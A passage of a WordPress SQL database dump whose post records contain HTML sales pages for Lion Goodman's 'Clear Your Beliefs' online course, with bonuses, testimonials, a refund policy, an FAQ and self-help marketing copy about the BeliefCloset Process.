as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;margin-right: 60px;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n<div style="text-align: right;"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'publish', 'closed', 'open', '', 'copy-of-cyb', '', '', '2014-06-17 17:07:31', '2014-06-17 22:07:31', '', 0, 'http://clearyourbeliefs.com/?page_id=936', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(948, 4194, '2014-06-17 17:03:00', '2014-06-17 22:03:00', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s 